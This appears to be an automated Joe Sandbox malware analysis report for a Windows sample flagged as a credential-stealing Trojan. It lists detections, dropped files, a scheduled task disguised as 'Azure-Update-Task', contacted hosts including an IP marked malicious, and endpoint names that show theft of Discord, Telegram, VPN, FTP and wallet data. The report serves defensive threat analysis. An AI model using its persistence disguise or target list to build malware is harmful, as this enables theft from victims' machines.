                      C:\Users\user\AppData\Local\Temp\filename.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\filename.exe49%ReversingLabsWin32.Trojan.Racealer
                      C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe49%ReversingLabsWin32.Trojan.Racealer

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.filename.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                      14.2.sihost.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.ip.sb/geoip%USERPEnviron0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartInstalledSoftwares0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartNordVPN0%Avira URL Cloudsafe
                      http://tempuri.org/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartDiscord0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartInstalledBrowsersResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartColdWalletsResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartTelegramFilesResponsel0%Avira URL Cloudsafe
                      https://cdn.ecosia/0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                      http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartProtonVPNResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartDiscordResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartFtpConnectionsResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartOpenVPN0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartOpenVPNResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartProtonVPN0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartHardwaresResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/PartTelegramFilesResponse0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s3-r-w.us-east-2.amazonaws.com
                      		52.219.104.152
                      		truefalse
                        		high
                        api.ip.sb
                        		unknown
                        		unknownfalse
                          		unknown
                          cli-4576347563476534786.s3.us-east-2.amazonaws.com
                          		unknown
                          		unknownfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TexteYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/02/sc/scteYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                		high
                                https://api.ip.sb/geoip%USERPEnvironeYvT1lg5Dy.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabeYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drfalse
                                      		high
                                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinaleYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                        		high
                                        http://tempuri.org/Endpoint/PartInstalledSoftwareseYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagews.com/crypted.exeeYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmpfalse
                                            		high
                                            http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                              		high
                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCTeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                		high
                                                http://tempuri.org/Endpoint/PartNordVPNeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://docs.oasis-open.org/ws-tx/wscoor/2006/06eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://tempuri.org/eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Endpoint/PartDiscordeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://tempuri.org/Endpoint/SetEnvironmenteYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://tempuri.org/Endpoint/SetEnvironmentResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecreteYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://support.google.com/chrome/?p=plugin_realeYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/CanceleYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CanceleYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512/IssueeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://docs.oasis-open.org/ws-tx/wsat/2006/06/faulteYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCTeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faulteYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsateYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Endpoint/VerifyUpdateeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/ReneweYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegistereYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Endpoint/PartInstalledBrowsersResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Endpoint/PartColdWalletsResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgementeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://docs.oasis-open.org/ws-tx/wsat/2006/06/ReplayeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://tempuri.org/Endpoint/PartTelegramFilesResponseleYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://docs.oasis-open.org/ws-tx/wsat/2006/06/AbortedeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://cdn.ecosia/eYvT1lg5Dy.exe, 00000001.00000002.448050710.000000000A570000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CanceleYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drfalse
                                                                                                  		high
                                                                                                  http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseeYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://tempuri.org/Endpoint/PartProtonVPNResponseeYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://tempuri.org/Endpoint/PartDiscordResponseeYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://docs.oasis-open.org/ws-tx/wsat/2006/06/PreparedeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.google.com/chrome/?p=plugin_shockwaveeYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Endpoint/PartFtpConnectionsResponseeYvT1lg5Dy.exe, 00000001.00000002.440804678.0000000005462000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Endpoint/PartOpenVPNeYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Endpoint/EnvironmentSettingsResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/CanceleYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Endpoint/PartOpenVPNResponseeYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnseYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/ReneweYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PCeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageDeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://support.google.com/chrome/?p=plugin_wmpeYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/CanceleYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequestedeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://support.google.com/chrome/?p=plugin_javaeYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://docs.oasis-open.org/ws-tx/wsat/2006/06/CompletioneYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/06/addressingexeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://cli-4576347563476534786.s3.us-east-2.amazonaws.comeYvT1lg5Dy.exe, 00000001.00000002.438333852.0000000004FD8000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/IssueeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://tempuri.org/Endpoint/PartProtonVPNeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://docs.oasis-open.org/ws-tx/wsat/2006/06/CommiteYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://tempuri.org/Endpoint/PartHardwaresResponseeYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://tempuri.org/Endpoint/PartTelegramFilesResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/ReneweYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://support.google.com/chrome/?p=plugin_divxeYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high

                                                                                                                                                                                      Contacted IPs

                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                      Public

                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      52.219.104.152
                                                                                                                                                                                      		s3-r-w.us-east-2.amazonaws.comUnited States
                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                      80.87.192.249
                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                      		29182THEFIRST-ASRUtrue

                                                                                                                                                                                      General Information

                                                                                                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                                      Analysis ID:490258
                                                                                                                                                                                      Start date:25.09.2021
                                                                                                                                                                                      Start time:10:15:42
                                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 9m 39s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Sample file name:eYvT1lg5Dy.exe
                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                      Number of analysed new started processes analysed:26
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • HDC enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@11/25@4/2
                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                      HDC Information:
                                                                                                                                                                                      • Successful, ratio: 2.5% (good quality ratio 2.5%)
                                                                                                                                                                                      • Quality average: 91.2%
                                                                                                                                                                                      • Quality standard deviation: 8.9%
                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                      • Successful, ratio: 53%
                                                                                                                                                                                      • Number of executed functions: 30
                                                                                                                                                                                      • Number of non-executed functions: 96
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                      Warnings:
                                                                                                                                                                                      Show All
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 104.26.12.31, 172.67.75.172, 104.26.13.31, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.211.4.86
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                      Simulations

                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                      10:17:09API Interceptor82x Sleep call for process: eYvT1lg5Dy.exe modified
                                                                                                                                                                                      10:17:24Task SchedulerRun new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe

                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                      IPs

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      80.87.192.249NWf7mrvHAE.exeGet hashmaliciousBrowse

                                                                                                                                                                                        Domains

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        s3-r-w.us-east-2.amazonaws.comoSv6Vgl6q4.msiGet hashmaliciousBrowse
